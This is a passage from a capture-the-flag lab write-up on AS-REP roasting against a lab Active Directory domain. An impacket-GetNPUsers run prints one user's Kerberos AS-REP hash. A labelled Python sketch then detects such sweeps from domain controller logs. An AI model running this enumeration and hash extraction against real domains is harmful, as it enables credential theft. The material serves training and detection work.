ASREPRoasting


  • 4 valid domain users were initially discovered through a brute force attack against the target KDC service
    • Although an additional attempt was made to further enumerate the domain users, no progress was made
  • At a later stage, 2 additional users were found through RID Cycling

Nonetheless, all the users were put into a list

I will attempt to see if any of those 4 domain users have DONT_REQ_PREAUTH set

impacket-GetNPUsers


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-GetNPUsers rebound.htb/ -dc-ip $IP -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User dc01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:90c3a832e192657f0094b87af3682c57$79369b524e402593a12ea8a470be7d9a380533fe4f2cdc1092d02eb9126ae012028681df29bca8219353ade767dbcd9828ff02dd748a676aa43a5b526ed6df282d0c28584f8f6f5d9ef7059e25351cf601a84d786c34474df883b96d15c0bf453ff0b32fcbd8255b0ad32d420af2982b0e98ec9357cd12984efcba5ec7d3b3e340a6ec70cbe87085acc6bb85866a097c896a80fd43bda6652120999f1dac8f091ca607115be791e916ae85e342e3be12893b02ba59aaf382eea7a0bd58231a053011b1d142a2f52e4ac787f9d961dd3ec02b160436123cf447e983a7d02438fe46fb7b3dea46c7e75aee
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

The jjones user has the DONT_REQ_PREAUTH bit set. Hashcat was unable to crack the password hash.
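Seen from the domain controller, a user-list sweep like the one above shows up in Security event 4768 when Kerberos Authentication Service auditing is enabled: a TGT issued with Pre-Authentication Type 0 (encryption type 0x17 matches the `$krb5asrep$23$` prefix), next to failures 0x6 and 0x12 from the same source. The following detection sketch is an added example, not part of the original notes; the records are constructed, the field names follow the 4768 EventData, and the threshold is an assumption.

```python
from collections import defaultdict

# Kerberos result codes as logged in the Status field of Security event 4768
PRINCIPAL_UNKNOWN = 0x6   # KDC_ERR_C_PRINCIPAL_UNKNOWN
CLIENT_REVOKED = 0x12     # KDC_ERR_CLIENT_REVOKED (disabled, expired or locked out)
ENUM_THRESHOLD = 3        # assumption: distinct failed names per source before alerting

def ev(user, ip, status, preauth, etype):
    """Build one constructed record using 4768 EventData field names."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample events, not taken from the lab on this page
SAMPLE_EVENTS = [
    ev("alice", "::ffff:192.0.2.10", "0x0", "2", "0x12"),        # normal logon
    ev("alcie", "::ffff:192.0.2.11", "0x6", "-", "0xFFFFFFFF"),   # single typo
    ev("ghost1", "::ffff:192.0.2.50", "0x6", "-", "0xFFFFFFFF"),
    ev("locked1", "::ffff:192.0.2.50", "0x12", "-", "0xFFFFFFFF"),
    ev("svc_legacy", "::ffff:192.0.2.50", "0x0", "0", "0x17"),   # no pre-auth, RC4
    ev("ghost2", "::ffff:192.0.2.50", "0x6", "-", "0xFFFFFFFF"),
]

def source_ip(raw):
    """Strip the IPv4-mapped prefix the KDC puts in front of IPv4 addresses."""
    return raw[7:] if raw.lower().startswith("::ffff:") else raw

def analyse(events, enum_threshold=ENUM_THRESHOLD):
    """Return {source: finding} for sources that look like an AS-REP roasting sweep."""
    no_preauth, failed = defaultdict(set), defaultdict(set)
    for e in events:
        src, user = source_ip(e["IpAddress"]), e["TargetUserName"].lower()
        status = int(e["Status"], 16)
        if status == 0 and e["PreAuthType"] == "0":
            # TGT issued without pre-authentication: the reply can be attacked offline
            no_preauth[src].add((user, int(e["TicketEncryptionType"], 16)))
        elif status in (PRINCIPAL_UNKNOWN, CLIENT_REVOKED):
            failed[src].add(user)
    findings = {}
    for src in set(no_preauth) | set(failed):
        hits = sorted(no_preauth[src])
        if hits or len(failed[src]) >= enum_threshold:
            findings[src] = {
                "no_preauth_users": [u for u, _ in hits],
                "rc4_replies": [u for u, et in hits if et == 0x17],
                "failed_names": len(failed[src]),
            }
    return findings

if __name__ == "__main__":
    for src, finding in analyse(SAMPLE_EVENTS).items():
        print(src, finding)
```

Any account reported under `no_preauth_users` is a candidate for re-enabling Kerberos pre-authentication and rotating to a long random password, since the issued reply stays attackable offline.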

There is another way to use the account with the DONT_REQ_PREAUTH bit set